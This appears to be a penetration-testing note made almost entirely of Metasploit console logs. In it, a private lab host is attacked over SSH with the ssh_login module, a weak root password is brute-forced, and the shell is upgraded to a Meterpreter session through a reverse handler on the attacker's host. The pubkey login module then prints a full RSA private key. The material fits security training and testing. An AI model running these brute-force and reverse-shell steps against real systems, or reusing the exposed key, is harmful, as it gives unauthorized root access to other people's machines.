Pentest – SSH login

Username/Password Auth

msf auxiliary(ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ---- --------------- -------- -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE         /tmp/pass.txt    no        File containing passwords, one per line
   RHOSTS            192.168.1.103    yes       The target address range or CIDR identifier
   RPORT             22222            yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           2                yes       The number of concurrent threads
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > run 

[*] 192.168.1.103:22222 SSH - Starting bruteforce
[-] 192.168.1.103:22222 SSH - Failed: 'root:pass'
[-] 192.168.1.103:22222 SSH - Failed: 'root:pass123'
[-] 192.168.1.103:22222 SSH - Failed: 'root:123456'
[-] 192.168.1.103:22222 SSH - Failed: 'root:admin'
[-] 192.168.1.103:22222 SSH - Failed: 'root:root'
[+] 192.168.1.103:22222 SSH - Success: 'root:password' 'uid=0(root) gid=0(root) groups=0(root) Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.1.108:41477 -> 192.168.1.103:22222) at 2015-11-09 13:55:40 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -l

Active sessions
===============

  Id  Type         Information                              Connection
  -- ---- ----------- ----------
  1   shell linux  SSH root:password (192.168.1.103:22222)  192.168.1.108:41477 -> 192.168.1.103:22222 (192.168.1.103)

msf auxiliary(ssh_login) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -K        Terminate all sessions
    -c   Run a command on the session given with -i, or all
    -h        Help banner
    -i   Interact with the supplied session ID
    -k   Terminate sessions by session ID and/or range
    -l        List all active sessions
    -q        Quiet mode
    -r        Reset the ring buffer for the session given with -i, or all
    -s   Run a script on the session given with -i, or all
    -t   Set a response timeout (default: 15)
    -u   Upgrade a shell to a meterpreter session on many platforms
    -v        List verbose fields


Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

msf auxiliary(ssh_login) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse handler on 192.168.1.108:4433 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 192.168.1.103
[*] Command stager progress: 100.00% (670/670 bytes)
msf auxiliary(ssh_login) > [*] Meterpreter session 2 opened (192.168.1.108:4433 -> 192.168.1.103:57029) at 2015-11-09 13:56:32 +0000

msf auxiliary(ssh_login) > sessions -l

Active sessions
===============

  Id  Type                   Information                                          Connection
  -- ---- ----------- ----------
  1   shell linux            SSH root:password (192.168.1.103:22222)              192.168.1.108:41477 -> 192.168.1.103:22222 (192.168.1.103)
  2   meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ kali  192.168.1.108:4433 -> 192.168.1.103:57029 (192.168.1.103)

Key Auth

msf auxiliary(ssh_login_pubkey) > show options 

Module options (auxiliary/scanner/ssh/ssh_login_pubkey):

   Name              Current Setting  Required  Description
   ---- --------------- -------- -----------
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   KEY_PATH          /tmp/id_rsa      yes       Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped.
   RHOSTS            192.168.1.103    yes       The target address range or CIDR identifier
   RPORT             22222            yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME          root             no        A specific username to authenticate as
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login_pubkey) > run 

[*] 192.168.1.103:22222 SSH - Testing Cleartext Keys
[*] 192.168.1.103:22222 SSH - Testing 1 keys from /tmp/id_rsa
[+] 192.168.1.103:22222 SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAyJWSHJ90LGFbKraEt5QkozE8GmjfsQR1iOVPIwQuNmm8/ehO
VPDWjz8H23BRXgLmsOoYAkgQe2fIUrgiBjUsgX4fhcPKO3PvgjjR8D86eES7Dmlb
PPCNF4LyMyAm3LkP3iSb5youhhFRLRevNvzq1jJlTuzi6nyY6i0pC5yWbRTJUjNU
Bk9ao6C4GnZzjlilQochRMrZWGcDkkeV154E1Leq0UtBl3INFBB4U5rH6tC34eEZ
5BeuAMnkdEp2p/nYzJrbxg6ead6/bWGJLXqKaIi3YmDpASvvcer4cs2b5guPCpn6
Hk8WsmrlnbWbpxh4lfJ4oPTlbglP5h0ScK+nMwIDAQABAoIBADH+zedieyNgtMeF
rLjRLPycFf4DK9ZEZUNU3I++yAH6AwhKcdPMH76emEfCzBUhpfxsrMVMzwbjTFQJ
3zkq4cf49sRxk6OT9xu/K9y09c7qWrFx4zLiRliY4+OIXQdg/SqCd3V71xLFmDUk
FSEgkywGbafpdXm6yqZ70SI6ymeveKeYhg1Rcm5EC8ZrBqai6oZq1QJuWxpq0BIQ
zWzfTr/GD8o84NxZVDJF3I5XT7JKBshHLnXiaDTFMmWI0h0gNnga/qK27waMlY3E
flgLMXF2faeG+S9Tc4GHtTLSeHRo+wph3V1+dynw9AUEud7MYU6bP5JtzKYqYf4W
ZA5MHSECgYEA6VGFQcA5Xirw/+ltaqKjesVaoYzICz/XsRObchsDlkF+duQOiPo6
EJtE5LnJ5YEOudMC9FyBrLhGLnHgWVhJZkIALxIvhb0oUULh9Skqcyxjfh6DDcWL
hsCF/3upyc3k3mw/LUSoo+OlY1PdI8qX6EIH9jSjBpgCbdKf0ybnwuMCgYEA3BVp
OvnhpWcsZ31kSoNG8XQsLcQ2r64uNjF9jhtYCUFTQZ6FyCg1pH8IHqN0y8ICq0pH
x3NK/35vYcb/wUlyXKCNn78dbW+tQrvWqj8vA/bEXqRpQx33J8fFP8M5ZYF9mVsX
rnj1GGPrO1Og+dHncq1EssKedSlCexK/JSsHq3ECgYEAluQx2iQG9e+vjNHaAWzN
bUjVJEV32k6fn9WeYl02JKaWsy0qeUva4YKJO6Mr/1FHxMXC02ZANwO137Ol9CI0
1f05QTfxo/yBZoxqtbK50WKTtazl9LIdWjiIcIH5fJm7ul0nPo94wQUooORL0Cnl
tD+ABqpkBI+qgnwFAPnYSSECgYEAzbQ5egUq8dVAPK6Hudl/ypih3lkCICw2RzL0
vokyPNxQ/Ak108I5eTm+lhyDQxtgMUepVXOeirVbV9GPJNMIUClEliYkVDBIihJV
byTFRfg0zJzxQelVJFplM9a94/EnOtpYhRvLQfPKXtYopLebk6T9i/O59ZoN6Ei6
XfwdHBECgYBv47rIvFeZfABI8nmif6HCGuQQhGjvTmqw6U2OQ58Uh/j/8EOLQeYZ
4zsKG+CiLDCdartBpnScurASl4PHx81u5kKL+ec49tuiv1zUruoLz8fCRbq65HF2
2YqgWuB17FScJFWydGtT1XC0xvzPVFGDaJ07YGqMrROwpejAQquKYw==
-----END RSA PRIVATE KEY-----
' 'uid=0(root) gid=0(root) groups=0(root) Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux '
[*] Command shell session 9 opened (192.168.1.108:34357 -> 192.168.1.103:22222) at 2015-11-09 16:23:04 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed